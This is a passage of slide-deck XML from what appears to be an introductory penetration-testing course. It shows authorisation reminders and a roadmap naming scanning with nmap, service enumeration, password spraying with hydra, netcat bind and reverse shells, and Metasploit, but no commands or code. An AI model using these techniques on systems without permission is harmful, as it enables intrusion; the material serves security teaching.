                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1958"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1450" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Shodan is not permission. </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1958"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="900"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1450" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>A machine being exposed does not make it fair game.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1450" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1958"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1350" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1958"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1450" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>When in doubt, stop and ask. </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1958"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="900"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1450" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>The lab VM on your laptop is always fair game.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="14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ROADMAP</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Where we are going</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04</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Shape 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548640" y="1572768"/>
            <a:ext cx="5440680" cy="987552"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 6481"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="150D26"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="342A4A"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="777240" y="1792224"/>
            <a:ext cx="685800" cy="548640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="701DF5"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>01</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1554480" y="1737360"/>
            <a:ext cx="4297680" cy="320040"/>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Foundations</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1554480" y="2075688"/>
            <a:ext cx="4297680" cy="320040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1250" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9E95B8"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>ports, TCP, UDP, what a pentest actually is</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1250" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Shape 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6172200" y="1572768"/>
            <a:ext cx="5440680" cy="987552"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 6481"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="150D26"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="342A4A"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Text 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6400800" y="1792224"/>
            <a:ext cx="685800" cy="548640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="701DF5"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>02</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Text 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7178040" y="1737360"/>
            <a:ext cx="4297680" cy="320040"/>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Discovery and scanning</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Text 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7178040" y="2075688"/>
            <a:ext cx="4297680" cy="320040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1250" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9E95B8"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>nmap and every scan type worth knowing</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1250" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Shape 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548640" y="2743200"/>
            <a:ext cx="5440680" cy="987552"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 6481"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="150D26"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="342A4A"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Text 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="777240" y="2962656"/>
            <a:ext cx="685800" cy="548640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="701DF5"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>03</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Text 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1554480" y="2907792"/>
            <a:ext cx="4297680" cy="320040"/>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Enumeration</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Text 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1554480" y="3246120"/>
            <a:ext cx="4297680" cy="320040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1250" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9E95B8"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>FTP, SSH, DNS, SMTP, SNMP, SMB</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1250" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Shape 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6172200" y="2743200"/>
            <a:ext cx="5440680" cy="987552"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 6481"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="150D26"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="342A4A"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Text 16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6400800" y="2962656"/>
            <a:ext cx="685800" cy="548640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="701DF5"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>04</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Text 17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7178040" y="2907792"/>
            <a:ext cx="4297680" cy="320040"/>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Credentials</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Text 18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7178040" y="3246120"/>
            <a:ext cx="4297680" cy="320040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1250" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9E95B8"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>hydra, wordlists, spraying</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1250" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Shape 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548640" y="3913632"/>
            <a:ext cx="5440680" cy="987552"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 6481"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="150D26"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="342A4A"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Text 20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="777240" y="4133088"/>
            <a:ext cx="685800" cy="548640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="701DF5"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>05</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Text 21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1554480" y="4078224"/>
            <a:ext cx="4297680" cy="320040"/>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Shells</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Text 22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1554480" y="4416552"/>
            <a:ext cx="4297680" cy="320040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1250" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9E95B8"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>netcat, bind shell, reverse shell</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1250" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Shape 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6172200" y="3913632"/>
            <a:ext cx="5440680" cy="987552"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 6481"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="150D26"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="342A4A"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Text 24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6400800" y="4133088"/>
            <a:ext cx="685800" cy="548640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="701DF5"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>06</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Text 25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7178040" y="4078224"/>
            <a:ext cx="4297680" cy="320040"/>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Exploitation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="Text 26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7178040" y="4416552"/>
            <a:ext cx="4297680" cy="320040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1250" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9E95B8"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Metasploit and Metasploitable</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1250" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Shape 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548640" y="5084064"/>
            <a:ext cx="5440680" cy="987552"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 6481"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="150D26"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="342A4A"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Text 28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="777240" y="5303520"/>
            <a:ext cx="685800" cy="548640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="701DF5"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>07</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Text 29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1554480" y="5248656"/>
            <a:ext cx="4297680" cy="320040"/>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Case studies</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Text 30"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1554480" y="5586984"/>
            <a:ext cx="4297680" cy="320040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1250" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9E95B8"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>WannaCry and Colonial Pipeline</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1250" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="Shape 31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6172200" y="5084064"/>
            <a:ext cx="5440680" cy="987552"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 6481"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="150D26"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="342A4A"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Text 32"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6400800" y="5303520"/>
            <a:ext cx="685800" cy="548640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
